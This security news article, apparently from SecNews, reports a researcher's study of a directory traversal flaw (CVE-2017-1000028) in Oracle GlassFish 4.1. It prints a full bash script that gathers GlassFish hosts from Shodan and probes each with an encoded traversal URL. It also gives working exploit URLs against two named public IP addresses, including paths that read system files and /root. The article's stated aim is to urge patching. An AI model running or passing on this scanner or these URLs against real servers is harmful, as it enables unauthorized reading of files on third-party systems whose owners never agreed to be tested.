HomeSecurityOracle GlassFish: Vulnerability exposes data of thousands of servers worldwide (Analysis)

Oracle GlassFish: Vulnerability exposes data from thousands of servers worldwide (Analysis)

GlassFish Oracle Vulnerability: Security researcher Dimitris Roussis analyzes how a vulnerability in Oracle 's well-known GlassFish Application Server , identified as CVE -2017-1000028 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028 ), currently exposes data on thousands of servers worldwide.

GlassFish Oracle

Exploiting the security gap allows reading, through a Directory Traversal Attack, of all files on the server where the Application Server is installed.

In the analysis carried out by the researcher, 300 servers are initially used as a sample through the shodan search engine that have GlashFish version 4.1 installed.

Oracle GlassFish: Vulnerability exposes data from thousands of servers worldwide (Analysis)

Then, through an automated script created by the researcher, it is checked which of the servers actually have the vulnerability.

#!/bin/bash # Get 300 Results From Shodan search engine shodan search --limit 300 --fields ip_str GlassFish 4.1 port:4848 > servers_ip.txt # Sort IP cat servers_ip.txt | sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 > servers_sort.txt # Remove All Whitespace sed -r 's/\s+//g' servers_sort.txt > servers.txt # Delete Temporary Files rm servers_ip.txt rm servers_sort.txt # Server List input="servers.txt" # check Server for the vulnerability while IFS= read -r line do ip=$line # https://server_ip/theme/META-INF/../../../../../../../../../../ url="https://$line:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%a f%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af" echo -n "ip: $line" fetch=`curl -s -o /dev/null --max-time 5 -w "%{http_code}" $url`; if [ $fetch = 200 ] then echo " - Connection Successful! Server is vulnerable" #Save result in vulnerable_servers.txt echo "$url" >> vulnerable_servers.txt else echo " - Connection Failed! Server is Not vulnerable" fi done < "$input"

Servers

The final result of the script is the creation of a file that includes links (urls) to directly exploit the vulnerability.

By looking at the links included in the browser we can see all the files in the /root of the Server.

Indicatively:

Windows Server

https://52.25.200.71:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

GlassFish Oracle

Linux Server

https://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

GlassFish Oracle Servers

We can now access any file we want on the Server by adding the file path to the end of the url.

B.C.

/etc/passwd

https://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/fstab

 

/root

https://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afroot

 

The above study demonstrates, on the one hand, that a vulnerability can lead to the disclosure of data on a large scale worldwide and, on the other hand, the necessity of immediate implementation of software updates by system administrators.

The editorial team of SecNews warmly thanks researcher Dimitrios Roussis for the authoritative and timely information.

 

 

 

 

* Dimitris Roussis is a member of the Information Systems Security Laboratory of the University of the Aegean.

https://www.icsd.aegean.gr/group/members-data.php?group=L1&member=1652

📧
Subscribe to the SecNews Newsletter

The most important Security & Technology news in your Inbox.

SEARCH

FOLLOW US

📧
Newsletter SecNews
The most important Security & Technology news in your inbox.

LIVE NEWS